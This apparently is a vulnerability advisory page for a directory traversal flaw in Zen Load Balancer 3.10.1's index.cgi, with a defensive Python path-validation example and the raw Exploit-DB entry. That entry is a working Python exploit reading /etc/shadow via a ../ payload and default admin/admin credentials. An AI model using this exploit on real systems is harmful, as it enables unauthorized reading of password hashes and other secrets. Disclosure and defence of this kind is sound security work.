Vendor: Zen Load Balancer
By: Basim Alabdullah
CVSS: 7.5 (HIGH)
CWE: 22 (Directory Traversal)
Product Name: Zen Load Balancer
Affected Version From: 3.10.1
Affected Version To: 3.10.1
Patch Exists: YES
Related CWE: N/A
CPE: a:zenloadbalancer:zen_load_balancer
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Debian8u2
Year: 2020

Zen Load Balancer 3.10.1 – ‘index.cgi’ Directory Traversal

The filelog parameter of index.cgi is vulnerable to path traversal, giving read access to arbitrary files on the server. The payload ../../../../../../../../../../../../../../../../etc/shadow was submitted in the filelog parameter, and the requested file was returned in the application's response. Disclosure of the shadow file may allow an attacker to discover users' passwords.

Mitigation:

Ensure that user input is validated and sanitized before being used in file operations.
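
One way to apply this mitigation to a log-viewer parameter such as filelog, shown as an added example rather than Zen Load Balancer's own code: canonicalize the requested name and refuse anything that does not resolve to a regular file inside the log directory. The names LOG_DIR, UnsafePath and resolve_log_path are hypothetical, and the inputs are constructed.

```python
import os
import tempfile

LOG_DIR = "/var/log"  # assumed log root, not taken from the product


class UnsafePath(ValueError):
    """The requested name resolves outside the log directory."""


def resolve_log_path(filelog, log_dir=LOG_DIR):
    """Return the canonical path of a requested log file or raise UnsafePath."""
    if not filelog or "\x00" in filelog:
        raise UnsafePath("empty name or NUL byte")
    base = os.path.realpath(log_dir)
    # realpath collapses ".." and follows symlinks, so the containment
    # check runs on the file that would actually be opened.
    candidate = os.path.realpath(os.path.join(base, filelog))
    if candidate == base or os.path.commonpath([base, candidate]) != base:
        raise UnsafePath("outside log directory: %r" % filelog)
    if not os.path.isfile(candidate):
        raise UnsafePath("not a regular file: %r" % filelog)
    return candidate


def demo():
    """Run the check over constructed inputs in a throwaway directory."""
    results = {}
    with tempfile.TemporaryDirectory() as root:
        log_dir = os.path.join(root, "logs")
        os.mkdir(log_dir)
        secret = os.path.join(root, "secret")
        for path in (os.path.join(log_dir, "app.log"), secret):
            with open(path, "w") as fh:
                fh.write("constructed sample\n")
        # A symlink inside the log directory that points outside it.
        os.symlink(secret, os.path.join(log_dir, "link.log"))
        names = ["app.log", "../secret", "../" * 16 + "etc/shadow",
                 "/etc/shadow", "link.log"]
        for name in names:
            try:
                resolve_log_path(name, log_dir)
                results[name] = "allowed"
            except UnsafePath:
                results[name] = "rejected"
    return results


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(verdict, name)
```

The caller should open the path the function returns, not the original parameter, so the file read is the one that was checked.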

Exploit-DB raw data:

# Exploit Title: Zen Load Balancer 3.10.1 - 'index.cgi' Directory Traversal
# Date: 2020-04-10
# Exploit Author: Basim Alabdullah
# Software Link: https://sourceforge.net/projects/zenloadbalancer/files/Distro/zenloadbalancer-distro_3.10.1.iso/download
# Version: 3.10.1
# Tested on: Debian8u2
#
# Technical Details:
# The filelog parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.
# The payload ../../../../../../../../../../../../../../../../etc/shadow was submitted in the filelog parameter. The requested file was returned in the application's response.
# Note that disclosure of the shadow file may allow an attacker to discover users' passwords
#
# Impact:
# --------
# Successful exploitation could allow an attacker to obtain sensitive
# information.

import requests
import sys

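# Both the base URL and the file path are required arguments.
if len(sys.argv) < 3:
    print("Example Use: python exploit.py https://192.168.1.1:444 /etc/shadow")
    sys.exit(-1)
else:
    files = sys.argv[2]
    url = sys.argv[1]
    with requests.session() as s:
        # The requested path is appended after the ../ sequence in the filelog parameter.
        urlz = url + "/index.cgi?id=2-3&filelog=../../../../../../../../../../../../../../../../" + files + "&nlines=100&action=See+logs"
        # The request authenticates as admin/admin with certificate verification disabled.
        response = s.get(urlz, auth=('admin', 'admin'), verify=False)
        print(response.text)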